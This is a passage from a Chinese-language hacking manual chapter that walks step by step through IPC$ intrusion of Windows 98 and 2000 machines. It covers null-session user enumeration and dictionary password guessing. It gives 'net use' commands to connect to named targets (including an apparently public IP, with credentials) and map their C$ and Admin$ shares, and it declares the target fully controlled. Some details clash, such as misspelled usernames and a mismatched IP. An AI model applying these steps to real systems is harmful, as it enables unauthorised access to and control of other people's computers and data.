IPC$入侵为入侵者最常见的入侵方式，也可以说所有最基层的入侵都是在IPC$的入侵上开始的。

IPC是Internet Process Connection的缩写，IPC$是共享"命名管道"的资源，它对于程序间的通信很重要。在远程管理和查看计算机的共享资源时使用。利用IPC$入侵者可以与目标主机建立一个空的连接(无需用户名与密码)或是根据其口令建立远程连接，如果在没有服务器上用户信息的情况下，可以利用建立空的连接得到目标主机上的用户列表。比如国内的著名扫描软件“流光”就是根据IPC$建立空连接得到用户列表，还可以配合字典，进行密码尝试。远程主机和目标主机可以建立空连接，从而加大了计算机被攻击的指数。

由于NT系统在默认安装的情况下，每个分区存在隐藏共享，即为"盘符$"与"Admin$"(即：System32)，当删除其共享时，再次开机又自动地设为共享，如何永久删除其共享，请参阅4.2.2章节。

6.1.1 基于IPC$初级入侵

1. 测试所用工具：

Windows 9x下的MS-DOS 或Windows 2000下的命令提示符(cmd.exe)

2. Windows 98下的入侵测试

由于Windows 9x下的net命令功能没有像在Windows NT/2000下那么强大，所以在入侵前要在Windows 9x登录对话框中对用户名和密码进行更改。

目标服务器地址：192.168.0.78

用户名：Administrator

密码：ffhh.net

(1) 登录Windows 98到桌面时，会出现【请输入网络密码】对话框，在该对话框中将用户名输入为Administraotr，密码输入为ffhh.net，如图6-1所示。

(2) 单击【确定】按钮，会出现【设置Windows密码】对话框，接着系统会让用户再确认一次密码，在【确认新密码】文本框中再次输入ffhh.net，如图6-2所示。

(3) 单击【确定】按钮，进入Windows 98桌面，运行MS-DOS程序。

(4) 提示符下输入如下命令：

net use \\192.168.0.78\ipc$

输入完毕后按下Enter键，将出现如图6-3所示画面，并显示The command Was completed successfully (命令成功完成)，此时便和192.168.0.78建立了远程连接。

(5) 192.168.0.78上的C盘映射到本地为X盘，输入如下命令：

net use x: \\192.168.0.78\c$

输入完毕后按Enter键，接着系统会出现命令成功完成的英文字符，如图6-4所示。

此时双击打开【我的电脑】，可以看到目标机192.168.0.78上的C盘已映射成为本地的X盘，如图6-5所示。

(6) 双击打开X盘，就可看到192.168.0.78上C盘上所有内容，如图6-6所示的画面，此时已完全控制了目标机。

图6-5 目标机上的C盘内容

(7) 此时在MSDOS下输入如下命令后就可以看到与目标盘的连接：

net use

输入完毕后按Enter键，即可看到如图6-7所示的画面。

图6-7 显示本机与目标机的连接

(8) 由于Windows 98提示符下的命令没有NT下那么的强大，例如没有AT等一些命令，但Windows 98也可以使用部分的命令，例如查看远程计算机时间的：net time \\IP命令。查看192.168.0.78上现在的时间，在MSDOS下输入如下命令格式：

net time \\192.168.0.78

输入完毕后，即可以看到192.168.0.78上现在的时间，如图6-8所示。

图6-8 查看目标服务器上的时间

(9) 测试成功完成。

注：

● 如果出现如图1-8所示的画面，说明用户名及密码输入有误或是目标服务器没有该共享。

图6-9 建立远程连接时出现错误

● 如果目标服务器口令为空，在登录Windows 98时出现的对话框中将密码设为空 即可。

3. Windows 2000下的入侵测试

目标服务器地址：61.150.115.9

用户名：system32

密码：ffhh.net

(1) 打开命令提示符，即Windows 2000下的cmd.exe程序。

(2) 在命令提示符下输入如下命令：

net use \\61.150.115.9\ipc$ ffhh.net /user:administroat

输入完毕后按Enter键，出现如图6-10所示的图面，并显示命令成功完成。

图6-10 与目标机建立远程连接

(3) 将61.150.115.9上的System32文件夹(即Admin$共享)映射到本地为Y盘，输入如下命令：

net use y: \\61.150.115.9\admin$

输入完毕后按Enter键，接着系统会出现命令成功完成字样，如图6-11所示。

图6-11 映射目标机System32文件夹

此时双击打开【我的电脑】，可以看到目标机61.150.115.7上的System32文件夹下已映射成为本地的Y盘，如图6-12所示。

图6-12 目标System32文件夹映射到本地为Y盘

(4) 双击打开Y盘，就可看到61.150.115.9上System32文件下所有内容，如图6-13所示的图面，此时已完全控制了目标机。

图6-13 目标机上System32的文件夹中内容

(5) 入侵测试成功完成！